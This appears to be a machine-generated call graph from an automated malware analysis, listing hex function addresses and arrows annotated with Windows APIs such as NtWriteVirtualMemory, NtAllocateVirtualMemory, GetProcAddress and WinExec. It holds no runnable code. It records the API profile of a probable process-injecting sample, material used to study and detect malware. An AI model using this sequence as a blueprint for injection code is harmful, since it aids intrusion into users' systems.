25417 2bb1119 25415->25417 25418 2bb24ae 25416->25418 25419 2bb112e 25417->25419 25420 2bb24be 25418->25420 25422 2bb1144 25419->25422 25421 2bb24ce 25420->25421 25426 2bb24ef 25421->25426 25423 2bb119c 25422->25423 25424 2bb11a7 25423->25424 25425 2bb11b4 25424->25425 25428 2ba8824 3 API calls 25425->25428 25427 2bb253e 25426->25427 25429 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25427->25429 25430 2bb11c0 25428->25430 25431 2bb254a 25429->25431 25433 2bb11e1 25430->25433 25432 2bb256b 25431->25432 25434 2bb2576 25432->25434 25435 2bb1218 25433->25435 25437 2bb25ba 25434->25437 25436 2bb1230 25435->25436 25438 2ba8824 3 API calls 25436->25438 25439 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25437->25439 25440 2bb123c 25438->25440 25441 2bb25c6 25439->25441 25443 2bb125d 25440->25443 25442 2bb25e7 25441->25442 25446 2bb25f2 25442->25446 25444 2bb1275 25443->25444 25445 2bb129f 25444->25445 25449 2ba8824 3 API calls 25445->25449 25447 2bb2636 25446->25447 25448 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25447->25448 25450 2bb2642 25448->25450 25451 2bb12b8 25449->25451 25452 2bb2653 25450->25452 25666 2bb12c2 25451->25666 25453 2bb2669 25452->25453 25454 2bb267c 25453->25454 25455 2bb269d 25454->25455 25456 2bb26a8 25455->25456 25457 2bb26b5 25456->25457 25458 2bb26d4 25457->25458 25460 2bb26df 25458->25460 25459 2ba8824 3 API calls 25461 2bb133e 25459->25461 25462 2bb26ec 25460->25462 25465 2bb136a 25461->25465 25463 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25462->25463 25464 2bb26f8 25463->25464 25466 2bb2719 25464->25466 25467 2bb13a1 25465->25467 25468 2bb2724 25466->25468 25470 2bb13ae 25467->25470 25469 2bb2731 25468->25469 25473 2bb2750 25469->25473 25471 2ba8824 3 API calls 25470->25471 25472 2bb13ba 25471->25472 25474 2bb13d3 25472->25474 25475 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25473->25475 25476 2bb13f4 25474->25476 25478 2bb2774 25475->25478 25477 2bb142b 25476->25477 25479 2bb1436 25477->25479 25482 2bb27cc 25478->25482 25480 2bb1443 25479->25480 25481 2ba8824 3 API calls 25480->25481 25483 2bb144f 25481->25483 25484 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25482->25484 25485 2bb147b 25483->25485 25487 2bb27f0 25484->25487 25486 2bb1488 25485->25486 25488 2bb14a7 25486->25488 25490 2bb2829 25487->25490 25489 2bb14b2 25488->25489 25491 2ba8824 3 API calls 25489->25491 25494 2bb2860 25490->25494 25492 2bb14cb 25491->25492 26450 2bae2f8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25492->26450 25495 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25494->25495 25498 2bb286c 25495->25498 25496 2bb14d5 25496->25272 25497 2bb14dd 25496->25497 25516 2bb15ec 25496->25516 25496->25666 25499 2bb14fe 25497->25499 25501 2bb288a 25498->25501 25500 2bb1535 25499->25500 25502 2bb1540 25500->25502 25505 2bb28b7 25501->25505 25503 2bb154d 25502->25503 25504 2ba8824 3 API calls 25503->25504 25506 2bb1559 25504->25506 25509 2bb28e4 25505->25509 25507 2bb1585 25506->25507 25508 2bb1592 25507->25508 25510 2bb15b1 25508->25510 25513 2bb2911 25509->25513 25511 2bb15bc 25510->25511 25512 2ba8824 3 API calls 25511->25512 25664 2bb15d5 25512->25664 25514 2bb2992 25513->25514 25515 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25514->25515 25519 2bb29ab 25515->25519 25517 2bb164f 25516->25517 25518 2ba8824 3 API calls 25517->25518 25522 2bb1668 25518->25522 25520 2bb2a0e 25519->25520 25521 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25520->25521 25525 2bb2a27 25521->25525 25523 2bb16cb 25522->25523 25524 2ba8824 3 API calls 25523->25524 25529 2bb16e4 25524->25529 25526 2bb2a51 25525->25526 25562 2bb2bc5 25525->25562 25527 2bb2a7d 25526->25527 25531 2bb2ab4 25527->25531 25528 2bb2c13 25532 2bb2c4a 25528->25532 25530 2bb1743 25529->25530 25537 2bb175b 25530->25537 25534 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25531->25534 25535 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25532->25535 25533 2ba8824 3 API calls 25533->25537 25539 2bb2acd 25534->25539 25536 2bb2c63 25535->25536 25538 2bb2c84 25536->25538 25537->25533 25540 2bb1793 25537->25540 25542 2bb2cbb 25538->25542 25544 2bb2b30 25539->25544 25541 2bb17ca 25540->25541 25543 2bb17d7 25541->25543 25547 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25542->25547 25545 2ba8824 3 API calls 25543->25545 25546 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25544->25546 25548 2bb17e3 25545->25548 25551 2bb2b49 25546->25551 25550 2bb2cdf 25547->25550 25549 2bb1803 25548->25549 25553 2bb1824 25549->25553 25552 2bb2d33 25550->25552 25556 2bb2bac 25551->25556 25559 2bb2d6a 25552->25559 25554 2bb183c 25553->25554 25555 2bb185b 25554->25555 25558 2bb1866 25555->25558 25557 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25556->25557 25557->25562 25561 2ba8824 3 API calls 25558->25561 25560 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25559->25560 25565 2bb2d8e 25560->25565 25563 2bb187f 25561->25563 25562->25528 25564 2bb18a0 25563->25564 25566 2bb18ab 25564->25566 25568 2bb2dc7 25565->25568 25567 2bb18d7 25566->25567 25569 2bb18e2 25567->25569 25570 2bb2dfe 25568->25570 25572 2ba8824 3 API calls 25569->25572 25571 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25570->25571 25575 2bb2e0a 25571->25575 25573 2bb18fb 25572->25573 25574 2bb1918 25573->25574 25578 2bb193c 25574->25578 25576 2bb2e36 25575->25576 25577 2bb2e6d 25576->25577 25580 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25577->25580 25579 2bb197e 25578->25579 25581 2bb198b 25579->25581 25582 2bb2e86 25580->25582 25583 2ba8824 3 API calls 25581->25583 25586 2bb2ea7 25582->25586 25584 2bb1997 25583->25584 25585 2bb19b8 25584->25585 25588 2bb19c3 25585->25588 25587 2bb2ede 25586->25587 25589 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25587->25589 25590 2bb1a07 25588->25590 25591 2bb2f02 25589->25591 25592 2ba8824 3 API calls 25590->25592 25594 2bb2f17 25591->25594 26360 2bb4c6d 25591->26360 25593 2bb1a13 25592->25593 25595 2bb1a24 25593->25595 25599 2bb2f38 25594->25599 25596 2bb1a48 25595->25596 25598 2bb1a53 25596->25598 25597 2bb4ca4 25600 2bb4cdb 25597->25600 25604 2bb1a8a 25598->25604 25602 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25599->25602 25601 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25600->25601 25603 2bb4cf4 25601->25603 25605 2bb2f93 25602->25605 25608 2bb4d15 25603->25608 25606 2ba8824 3 API calls 25604->25606 25610 2bb2fb4 25605->25610 25607 2bb1aa3 25606->25607 25609 2bb1acf 25607->25609 25611 2bb4d4c 25608->25611 25614 2bb1afb 25609->25614 25612 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25610->25612 25613 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25611->25613 25615 2bb300f 25612->25615 25616 2bb4d70 25613->25616 25618 2bb1b13 25614->25618 25621 2bb3030 25615->25621 25622 2bb4d9c 25616->25622 25617 2ba8824 3 API calls 25617->25618 25618->25617 25619 2bb1b48 25618->25619 25620 2bb1b74 25619->25620 25627 2bb1ba0 25620->25627 25623 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25621->25623 25624 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25622->25624 25625 2bb308b 25623->25625 25626 2bb4dec 25624->25626 25630 2bb30ac 25625->25630 25631 2bb4e18 25626->25631 25628 2ba8824 3 API calls 25627->25628 25629 2bb1bc4 25628->25629 25632 2bb1bf0 25629->25632 25633 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25630->25633 25634 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25631->25634 25637 2bb1c1c 25632->25637 25635 2bb3107 25633->25635 25636 2bb4e68 25634->25636 25642 2bb3128 25635->25642 25646 2bb4e8e 25636->25646 25638 2bb1c34 25637->25638 25639 2ba8824 3 API calls 25638->25639 25640 2bb1c40 25639->25640 25641 2bb1c45 25640->25641 25643 2bb1c66 25641->25643 25644 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25642->25644 25645 2bb1c7e 25643->25645 25647 2bb3183 25644->25647 25649 2bb1ca8 25645->25649 25648 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25646->25648 25654 2bb31cd 25647->25654 25657 2bb4f0a 25648->25657 25650 2bb1cb5 25649->25650 25651 2ba8824 3 API calls 25650->25651 25652 2bb1cc1 25651->25652 25653 2bb1ce2 25652->25653 25655 2bb1ced 25653->25655 25658 2bb3231 25654->25658 25656 2bb1cfa 25655->25656 25662 2bb1d24 25656->25662 25659 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25657->25659 25660 2bb3249 25658->25660 25672 2bb4f86 25659->25672 25661 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25660->25661 25665 2bb3255 25661->25665 25663 2ba8824 3 API calls 25662->25663 25663->25664 25664->25496 25668 2bb32ad 25665->25668 25667 2bb12fb 25666->25667 25671 2bb131a 25667->25671 25669 2bb32c5 25668->25669 25670 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25669->25670 25676 2bb32d1 25670->25676 25671->25459 25673 2ba8824 3 API calls 25671->25673 25674 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25672->25674 25675 2bb1dde 25673->25675 25683 2bb502e 25674->25683 25677 2bb1e0a 25675->25677 25678 2bb3329 25676->25678 25679 2bb1e36 25677->25679 25680 2bb3341 25678->25680 25682 2bb1e4e 25679->25682 25681 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25680->25681 25689 2bb334d 25681->25689 25685 2ba8824 3 API calls 25682->25685 25684 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25683->25684 25695 2bb50aa 25684->25695 25686 2bb1e5a 25685->25686 25687 2bb1e6a 25686->25687 25690 2bb1e7a 25687->25690 25688 2bb335b 25688->25689 25689->25688 25692 2bb3419 25689->25692 25691 2bb1ea6 25690->25691 25693 2bb1ed2 25691->25693 25694 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25692->25694 25697 2bb1edd 25693->25697 25702 2bb3432 25694->25702 25696 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25695->25696 25707 2bb5126 25696->25707 25698 2bb1eea 25697->25698 25699 2ba8824 3 API calls 25698->25699 25700 2bb1ef6 25699->25700 25701 2bb1f17 25700->25701 25703 2bb1f22 25701->25703 25704 2bb3495 25702->25704 25711 2bb1f4e 25703->25711 25705 2bb34a2 25704->25705 25706 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25705->25706 25708 2bb34ae 25706->25708 25709 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25707->25709 25710 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25708->25710 25718 2bb51a2 25709->25718 25714 2bb34b3 25710->25714 25712 2bb1f66 25711->25712 25713 2ba8824 3 API calls 25712->25713 25713->25496 25715 2bb350b 25714->25715 25716 2bb3516 25715->25716 25717 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25716->25717 25720 2bb352f 25717->25720 25719 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25718->25719 25725 2bb524f 25719->25725 25721 2bb3587 25720->25721 25722 2bb3592 25721->25722 25723 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25722->25723 25724 2bb35ab 25723->25724 25727 2bb35cc 25724->25727 25726 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25725->25726 25731 2bb52cb 25726->25731 25728 2bb360e 25727->25728 25729 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25728->25729 25730 2bb3627 25729->25730 25733 2bb3648 25730->25733 25732 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25731->25732 25736 2bb5347 25732->25736 25734 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25733->25734 25735 2bb36a3 25734->25735 25738 2bb36b2 25735->25738 25737 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25736->25737 25741 2bb53c3 25737->25741 25739 2bb3722 25738->25739 25740 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25739->25740 25743 2bb372e 25740->25743 25742 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25741->25742 25746 2bb543f 25742->25746 25744 2bb379e 25743->25744 25745 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25744->25745 25748 2bb37aa 25745->25748 25747 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25746->25747 25751 2bb54bb 25747->25751 25749 2bb37e3 25748->25749 25750 2bb381a 25749->25750 25752 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25750->25752 25754 2bb551b 25751->25754 26269 2bb6743 25751->26269 25753 2bb3826 25752->25753 25756 2bb3852 25753->25756 25755 2bb553c 25754->25755 25757 2bb5547 25755->25757 25759 2bb386b 25756->25759 25760 2bb5554 25757->25760 25758 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25773 2bb6d34 25758->25773 25761 2bb3876 25759->25761 25762 2bb5573 25760->25762 25764 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25761->25764 25763 2bb557e 25762->25763 25766 2bb558b 25763->25766 25765 2bb3883 25764->25765 25767 2bb38a4 25765->25767 25768 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25766->25768 25771 2bb38c8 25767->25771 25769 2bb5597 25768->25769 25770 2bb55b8 25769->25770 25772 2bb55c3 25770->25772 25775 2bb38d3 25771->25775 25776 2bb55d0 25772->25776 25774 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25773->25774 25790 2bb6db0 25774->25790 25777 2bb38d9 25775->25777 25778 2bb55ef 25776->25778 25779 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25777->25779 25781 2bb55fa 25778->25781 25780 2bb38e0 25779->25780 25782 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25780->25782 25784 2bb5607 25781->25784 25783 2bb38e5 25782->25783 25785 2bb3906 25783->25785 25786 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25784->25786 25789 2bb391e 25785->25789 25787 2bb5613 25786->25787 25788 2bb5634 25787->25788 25795 2bb563f 25788->25795 25792 2bb393d 25789->25792 25791 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25790->25791 25800 2bb6e2c 25791->25800 25793 2bb3948 25792->25793 25794 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25793->25794 25797 2bb3961 25794->25797 25796 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25795->25796 25798 2bb568f 25796->25798 25799 2bb399a 25797->25799 25803 2bb56bb 25798->25803 25802 2bb39b9 25799->25802 25801 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25800->25801 25809 2bb6ea8 25801->25809 25804 2bb39c4 25802->25804 25808 2bb56f3 25803->25808 25805 2bb39d1 25804->25805 25806 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25805->25806 25807 2bb39dd 25806->25807 25810 2bb39fe 25807->25810 25811 2bb572a 25808->25811 25812 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25809->25812 25813 2bb3a35 25810->25813 25814 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25811->25814 25815 2bb6f24 25812->25815 25817 2bb3a40 25813->25817 25816 2bb5743 25814->25816 25830 2bb7a68 25815->25830 25831 2bb6f39 25815->25831 25820 2bb5764 25816->25820 25818 2bb3a4d 25817->25818 25819 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25818->25819 25828 2bb3a59 25819->25828 25826 2bb579b 25820->25826 25821 2bb3a63 25822 2bb3aad 25821->25822 25823 2bb3a67 25821->25823 25825 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25822->25825 25824 2bb3a78 25823->25824 25824->25828 25827 2bb3ab2 25825->25827 25829 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25826->25829 25834 2bb3ad8 25827->25834 25828->25821 25835 2bb57bf 25829->25835 25832 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25830->25832 25833 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25831->25833 25841 2bb7ae4 25832->25841 25842 2bb6fb5 25833->25842 25836 2bb3aef 25834->25836 25837 2bb57f8 25835->25837 25838 2bb3b1b 25836->25838 25839 2bb582f 25837->25839 25843 2bb3b47 25838->25843 25840 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25839->25840 25849 2bb583b 25840->25849 25844 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25841->25844 25845 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25842->25845 25846 2bb3b5f 25843->25846 25855 2bb7b60 25844->25855 25854 2bb7031 25845->25854 25847 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25846->25847 25848 2bb3b6b 25847->25848 25850 2bb3b97 25848->25850 25851 2bb58ab 25849->25851 25852 2bb3bc3 25850->25852 25853 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25851->25853 25856 2bb3bdb 25852->25856 25863 2bb58b7 25853->25863 25858 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25854->25858 25857 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25855->25857 25859 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25856->25859 25866 2bb7bdc 25857->25866 25861 2bb70ad 25858->25861 25860 2bb3be7 25859->25860 25864 2bb3c13 25860->25864 25862 2ba8410 GetModuleHandleA GetProcAddress WinExec 25861->25862 25876 2bb70d6 25862->25876 25871 2bb5941 25863->25871 25865 2bb3c3f 25864->25865 25868 2bb3c57 25865->25868 25867 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25866->25867 25869 2bb7c58 25867->25869 25870 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25868->25870 25874 2bb7c6d 25869->25874 25889 2bb8af1 25869->25889 25872 2bb3c63 25870->25872 25875 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25871->25875 25873 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25872->25873 25886 2bb3c68 25873->25886 25881 2bb7c8e 25874->25881 25882 2bb5984 25875->25882 25878 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25876->25878 25877 2bb3c72 25879 2bb3cd1 25877->25879 25880 2bb3c76 25877->25880 25896 2bb7152 25878->25896 25885 2bb3cf2 25879->25885 25883 2bb3c9c 25880->25883 25887 2bb7cc5 25881->25887 25884 2bb59bd 25882->25884 25883->25886 25890 2bb59f4 25884->25890 25888 2bb3d29 25885->25888 25886->25877 25892 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25887->25892 25894 2bb3d34 25888->25894 25891 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25889->25891 25893 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25890->25893 25908 2bb8b6d 25891->25908 25899 2bb7ce9 25892->25899 25895 2bb5a00 25893->25895 25898 2bb3d41 25894->25898 25903 2bb5a2c 25895->25903 25897 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25896->25897 25916 2bb71ce 25897->25916 25900 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25898->25900 25904 2bb7d22 25899->25904 25901 2bb3d4d 25900->25901 25902 2bb3d79 25901->25902 25905 2bb3d86 25902->25905 25910 2bb5a63 25903->25910 25907 2bb7d59 25904->25907 25906 2bb3da5 25905->25906 25913 2bb3db0 25906->25913 25911 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25907->25911 25909 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25908->25909 25925 2bb8be9 25909->25925 25912 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25910->25912 25914 2bb7d65 25911->25914 25915 2bb5a7c 25912->25915 25918 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25913->25918 25921 2bb7d91 25914->25921 25920 2bb5a9d 25915->25920 25917 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25916->25917 25935 2bb724a 25917->25935 25919 2bb3dc9 25918->25919 25922 2bb3dea 25919->25922 25923 2bb5ad4 25920->25923 25924 2bb7dc8 25921->25924 25929 2bb3e21 25922->25929 25928 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25923->25928 25926 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25924->25926 25927 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25925->25927 25930 2bb7de1 25926->25930 25950 2bb8c65 25927->25950 25933 2bb5af8 25928->25933 25931 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25929->25931 25932 2bb7e0d 25930->25932 25934 2bb3e45 25931->25934 25939 2bb7e30 25932->25939 25937 2bb5b31 25933->25937 25938 2bb3e66 25934->25938 25936 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25935->25936 25957 2bb72ed 25936->25957 25941 2bb5b68 25937->25941 25943 2bb3e9d 25938->25943 25940 2bb7ebe 25939->25940 25944 2bb7e42 25939->25944 25947 2bb7edf 25940->25947 25942 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25941->25942 25945 2bb5b74 25942->25945 25949 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25943->25949 25952 2bb7e6e 25944->25952 25956 2bb5ba0 25945->25956 25946 2bb9420 25948 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25946->25948 25959 2bb7ef7 25947->25959 25967 2bb949c 25948->25967 25951 2bb3ec1 25949->25951 25950->25946 25953 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25950->25953 25954 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25951->25954 25955 2bb7ea5 25952->25955 25969 2bb8d0b 25953->25969 25962 2bb3ec6 25954->25962 25961 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25955->25961 25963 2bb5bd7 25956->25963 25958 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25957->25958 25973 2bb7369 25958->25973 25960 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25959->25960 25965 2bb7f3a 25960->25965 25961->25940 25972 2bb3f03 25962->25972 25964 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25963->25964 25966 2bb5bf0 25964->25966 25976 2bb7f73 25965->25976 25971 2bb5c01 25966->25971 25968 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25967->25968 25982 2bb9518 25968->25982 25970 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25969->25970 25986 2bb8d87 25970->25986 25978 2bb5c36 25971->25978 25975 2bb3f3c 25972->25975 25974 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25973->25974 25990 2bb73e5 25974->25990 25979 2bb3f73 25975->25979 25977 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25976->25977 25981 2bb7fb6 25977->25981 25984 2bb5c6f 25978->25984 25980 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25979->25980 25985 2bb3f7f 25980->25985 25998 2bb8009 25981->25998 25983 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25982->25983 25989 2bb9594 25983->25989 25988 2bb5ca6 25984->25988 25991 2bb3fab 25985->25991 25987 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25986->25987 26015 2bb8e03 25987->26015 25993 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25988->25993 25992 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25989->25992 25996 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25990->25996 25994 2bb3fd7 25991->25994 25999 2bb95c7 25992->25999 25995 2bb5cb2 25993->25995 25997 2bb3fe2 25994->25997 26004 2bb5cde 25995->26004 26013 2bb7480 25996->26013 26000 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25997->26000 26003 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25998->26003 26001 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25999->26001 26002 2bb3ffb 26000->26002 26006 2bb95fa 26001->26006 26007 2bb401c 26002->26007 26005 2bb8064 26003->26005 26009 2bb5d15 26004->26009 26019 2bb8085 26005->26019 26008 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26006->26008 26011 2bb4053 26007->26011 26014 2bb962d 26008->26014 26010 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26009->26010 26012 2bb5d2e 26010->26012 26017 2bb405e 26011->26017 26021 2bb5d4f 26012->26021 26016 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26013->26016 26018 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26014->26018 26020 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26015->26020 26029 2bb74fc 26016->26029 26022 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26017->26022 26032 2bb9660 26018->26032 26024 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26019->26024 26034 2bb8eda 26020->26034 26026 2bb5d86 26021->26026 26023 2bb4077 26022->26023 26025 2bb4098 26023->26025 26037 2bb80e0 26024->26037 26031 2bb40cf 26025->26031 26027 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26026->26027 26028 2bb5daa 26027->26028 26043 2bb5dd6 26028->26043 26030 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26029->26030 26055 2bb7578 26030->26055 26036 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26031->26036 26033 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26032->26033 26046 2bb96dc 26033->26046 26035 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26034->26035 26051 2bb8f56 26035->26051 26042 2bb40f3 26036->26042 26038 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26037->26038 26039 2bb815c 26038->26039 26040 2bacfa4 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26039->26040 26056 2bb8170 26040->26056 26041 2bb40fd 26041->26042 26047 2bb4180 26041->26047 26042->26041 26044 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26043->26044 26045 2bb5e26 26044->26045 26048 2bb5e3b 26045->26048 26065 2bb6099 26045->26065 26049 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26046->26049 26050 2bb41b7 26047->26050 26059 2bb5e5c 26048->26059 26068 2bb9758 26049->26068 26053 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26050->26053 26054 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26051->26054 26150 2bb91d4 26051->26150 26052 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26073 2bb9296 26052->26073 26058 2bb41c3 26053->26058 26071 2bb8fe4 26054->26071 26060 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26055->26060 26057 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26056->26057 26079 2bb81f1 26057->26079 26061 2bb41ef 26058->26061 26064 2bb5e93 26059->26064 26062 2bb7635 26060->26062 26069 2bb41fc 26061->26069 26063 2ba7dd8 GetModuleHandleA GetProcAddress 26062->26063 26086 2bb7658 26063->26086 26066 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26064->26066 26067 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26065->26067 26072 2bb5eb7 26066->26072 26088 2bb6115 26067->26088 26070 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26068->26070 26074 2bb4226 26069->26074 26075 2bb97d4 26070->26075 26078 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26071->26078 26084 2bb5ef0 26072->26084 26076 2ba8824 NtWriteVirtualMemory 